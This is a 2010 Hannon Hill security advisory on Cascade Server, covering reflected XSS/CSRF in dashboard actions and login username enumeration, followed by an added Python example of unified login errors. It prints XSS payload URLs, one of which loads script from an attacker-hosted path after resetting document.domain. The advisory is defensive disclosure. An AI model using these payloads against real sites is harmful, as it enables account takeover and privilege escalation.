Security Update 05-06-2010

There are two different types of vulnerabilities mentioned in this update: XSS/CSRF and brute-force attack vulnerabilities.

Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) Vulnerabilities in Dashboard, Open, and Browse Actions

Severity: Moderate

Hannon Hill rates the severity of these vulnerabilities as Moderate. The vulnerabilities allow an attacker to make victims execute arbitrary JavaScript, gain access to Cascade, or elevate his/her privileges; but they require the attacker to manipulate victims using social engineering tactics. If the attacker already had Cascade credentials, he/she could embed a malicious link in frequently visited content to more easily manipulate victims into navigating to it.

Risk Assessment

The underlying vulnerability is that an input parameter's value is returned verbatim to the browser in the page forwarded to from the following actions: Dashboard, Open, and Browse.

XSS Vulnerability

An attacker without access to Cascade could use social engineering tactics to manipulate victims into executing arbitrary JavaScript when navigating to the Cascade dashboard action.
An example link would be:

http://domain:port/home.act?tab=m<script>alert(54682)</script>

An attacker with access to Cascade could embed a link to the Cascade dashboard action containing arbitrary JavaScript in a prominent place within Cascade page content to more easily manipulate victims into navigating to the link.

CSRF Vulnerability

The CSRF vulnerability is an extension of the XSS vulnerability.
Examples include:

http://<cascade_url>/home.act?tab="'><IMG%20SRC="/WF_XSRF.html">

and:

http://<cascade_url>/home.act?tab="'><script>document.domain=domain.dom</script><script%20src="http://subdomain.domain.com/attacker/x.js"/>

NOTE: Both require the attacker to have access to the Cascade server or to a server in the same top-level domain as the one Cascade is running on. For example, if Cascade is hosted at cascade.hannonhill.com, the attacker would also need access to the web space of a sub-domain such as intranet.hannonhill.com. In the second example, resetting the document domain of the page to the top-level domain lets the attacker bypass the browser's Same Origin policy and the security restrictions that would normally prevent a script from loading from a different server.

Vulnerability

The XSS and CSRF vulnerabilities exist in all Cascade Server versions prior to Cascade 6.4.5.

Fix

The fix is for Cascade to properly escape and/or hide user input when displaying the error message on the pages that the above actions forward to.

These have been fixed in Cascade 6.4.5 and later.

Brute force attack vulnerability in Login action

Severity: Moderate

Hannon Hill rates the severity of this vulnerability as Moderate rather than High because it does not affect all types of users or all authentication methods.

Risk Assessment

The vulnerability exists because users who authenticate using LDAP and users who attempt to authenticate using Web Services are shown different error messages depending on whether the username or the password is incorrect.

This opens the system up to a brute-force attack, as the attacker would be able to confirm the validity of a guessed username in some cases.

Vulnerability

This vulnerability exists in all versions of Cascade prior to 6.4.5.

Fix

The fix is to unify the error messages so that an incorrect username or password will generate the same error regardless of protocol or authentication method.
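The following is an added example, not Cascade's code, showing why cause-specific login errors let a guessed username be confirmed and how a unified message closes that gap. It stands in for the LDAP and Web Services backends with a constructed in-memory user store and goes one step beyond the advisory by also hashing on unknown usernames so that response timing does not reveal the cause either.

```python
"""Added example (not Cascade's code): cause-specific login errors versus a
unified error message. The user store below is a constructed stand-in for
the LDAP and Web Services authentication backends."""
import hashlib
import hmac
import logging
import secrets

log = logging.getLogger("auth")

def _record(password: str):
    """Constructed salted hash record: (salt, sha256(salt + password))."""
    salt = secrets.token_bytes(16)
    return salt, hashlib.sha256(salt + password.encode()).digest()

# Constructed sample accounts; names and passwords are illustrative only.
USERS = {"alice": _record("correct horse"), "bob": _record("battery staple")}
# Dummy record used for unknown usernames so both failure paths do the same work.
_DUMMY = _record(secrets.token_hex(16))

def check_password(record, password: str) -> bool:
    salt, digest = record
    candidate = hashlib.sha256(salt + password.encode()).digest()
    return hmac.compare_digest(candidate, digest)

def login_leaky(username: str, password: str) -> str:
    """Pre-fix behaviour: the message reveals which part was wrong, so a
    guessed username can be confirmed without knowing its password."""
    if username not in USERS:
        return "Unknown username"
    if not check_password(USERS[username], password):
        return "Incorrect password"
    return "OK"

def login_unified(username: str, password: str) -> str:
    """Fixed behaviour: one message for every failure, whatever the cause.
    The real cause is kept server-side, where it is useful for detecting
    brute-force attempts, instead of being returned to the caller."""
    record = USERS.get(username)
    # Always hash, even for unknown users, so timing does not differ by cause.
    match = check_password(record if record is not None else _DUMMY, password)
    if record is None or not match:
        cause = "no-such-user" if record is None else "bad-password"
        log.warning("login failed user=%r cause=%s", username, cause)
        return "Invalid username or password"
    return "OK"

def enumerable(login) -> bool:
    """True if a bad-password attempt is distinguishable from a bad-username one."""
    return login("alice", "wrong") != login("nobody", "wrong")
```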